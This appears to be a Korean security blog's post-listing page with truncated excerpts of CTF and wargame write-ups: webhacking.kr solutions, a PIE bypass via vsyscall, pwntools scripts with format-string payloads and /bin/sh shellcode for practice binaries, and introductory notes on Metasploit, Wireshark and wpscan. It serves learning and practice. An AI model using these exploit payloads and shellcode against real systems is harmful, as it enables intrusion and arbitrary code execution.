COMPUTER435 webhacking.kr 18번-SQL INJECTION SQL INJECTION 2018. 2. 7. webhacking.kr 16번 Challenge 16* 나머지는 *을 새로 만들고, 이동시키는 부분이다.우리가 필요한 부분은 하이라이트한!location.href=String.fromCharCode(cd) 이다.location.href는 페이지를 이동시킨다. event.keyCode에서 124에 해당하는 것은 | 이다. 이벤트(Event) Key code 정리키코드사용키(시스템)키코드사용키(숫자)13ENTER48027ESC49132SPACE BAR502 513 524 535 546 557 568 579키코드사용키(영어 대문자)키코드사용키(영어 소문자)65A97a66B98b67C99c68D100d69E101e70F102f71G103g72H104h73I105i74J106j75K107k76L108l77M109m78N110n79O111o80.. 2018. 2. 7. webhacking.kr 4번 ==으로 끝나는 것을 보아하니 base64로 암호화 되어 있다. base64로 복호화 하면c4033bff94b567a190e33faa551f411caef444f2이것은 16진수&40글자->SHA1 SHA1으로 복호화 하면a94a8fe5ccb19ba61c4c0873d391e987982fbbd3이것은 16진수&40글자->SHA1 decode하면->test라는 문자열이 나온다! 패스워드는! test 2018. 2. 7. First-PIE가 걸려 코드영역 주소도 바뀐경우->vsyscall이용 First- PIE가 걸려 있다 이 문제는 쉘을 따는게 아니라 플래그를 읽어오는것이고, 플래그 읽어오는 부위가 코드 영역에 있으며, 버퍼 오버플로우로 return address를 원하는 주소로 덮을 수 있지만, 문제는 PIE가 걸려있어서 주소가 랜덤으로 바뀐다는 것이다. vsyscall의 픽스된 주소를 이용할 것이며, 주소가 랜덤으로 바뀌기는 하지만 뒤 12비트는 고정됨을 이용할 것이다! Position Independent Executable 위치독립실행파일->바이너리 전체의 주소가 랜덤 코드 영역의 주소도 바뀐다. But,vsyscall부분의 영역은 주소 고정! 여기에 있는 ret을 사용한다. But,0x400쪽 불러오지 않으면 커널이 잡아낸다! 그니까 0x600409인 ret부분을 바로 불러오는게 .. 2018. 1. 25. ebp-쉘코드, fake ebp, $를 이용한 fsb, fgets의 stdin망가뜨려 while문 벗어나기 from pwn import *import time s=process('./ebp')#raw_input()s.send("%134520971c"+"%4$n"+"\x93\xa0\x04\x08"+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"+"\n")s.send("%4c"+"%16$n"+"\n") //fgets의 stdin망가뜨려 while문 벗어나기s.interactive()s.close() [김희연] [오전 3:25] 그래서 %4$n하면[김희연] [오전 3:25] 0xffffd148d안에[김희연] [오전 3:25] 들어있는값이[김희연] [오전 3:25] 조작되자나[김희연.. 2018. 1. 23. what-fsb $를 이용한 libc릭, 스택주소릭, fini array를 메인으로 %2$x %264$x를 해서 스택주소와 libc주소릭을 한다.fini_array부분은 write권한이 있으므로, 이 부분을 메인으로 고쳐 메인으로 돌린다.fsb를 이용하여 return address부분을 system주소로, return address+8부분을 /bin/sh주소로! from pwn import *import time s=process('./what')#print(s.recv(1024))#raw_input()payload=p32(0x080496dc)payload+="%2$x"payload+="%264$x"payload+="%33927c"payload+="%7$hn"s.send(payload+"\n")a=s.recv(1024)[0x1a:0x2a]libc=int(a[0:8],16)system=l.. 2018. 1. 23. [웹 해킹 입문] 7. Metasploit Metasploit 메타스플로잇은 방대한 취약점 DB를 이용하여 악성 코드를 작성하여 배포한다. 메타스플로잇의 가장 큰 특징은 내부 프레임워크를 사용하여 쉽게 익스플로잇 코드를 만든다는 점이다.즉, 우리가 하나하나 코딩할 필요가 없다는 뜻이다. 바로 바이러스로 인식! 2018. 1. 16. [웹 해킹 입문] 6. WireShark WireShark 네트워크 패킷을 캡처하고 분석하는 오픈소스 도구 PCAP(Packet Capture)은 네트워크 트래픽을 캡처하는 API 구성이다.와이어샤크는 자체 프로그램으로 네트워크 트래픽을 캡쳐하는 것이 아니고, 운영체제에서 지원하는 캡처 라이브러리를 이용하여 수집! 스니핑은 네트워크 패킷을 잡는 기술을 말한다. 네트워크 카드-Normal Mode-Promiscuous Mode pcapng포맷으로 로그인성공시 와이어샤크로 캡처하고 저장한다. 2018. 1. 16. [웹 해킹 입문] 5. 스캔 해킹 전에 시스템의 상태를 파악할 수 있는 도구!->스캐닝 도구! 스캐닝 도구는 서버의 상태, 사양, 취약점 및 각종 정보를 쉽게 탐색보완환경이 잘 갖춰진 조직이나 기관은 이러한 도구의 사용을 바로 탐지할 수 있는 장비를 갖춤 주요스캐닝 도구-> WPSCAN, Nmap, Nikto, Netcat 1) WPSCAN WPScan은워드프레스 관련 취약점을 점검하는 도구이다. 워드프레스를 위한 전용 점검 도구로 간단한 명령으로 많은 취약점을 파악한다.WPScan은 기존의 취약점을 데이터베이스화하여 사용자에게 취약 정보를 제공한다. wpscan --url ~~~ --enumerate p //해당 워드프레스에 설치된 플러그인을 열거한다wpscan --url ~~~ --enumerate u //user name:id.. 2018. 1. 16. 이전 1 ··· 26 27 28 29 30 31 32 ··· 49 다음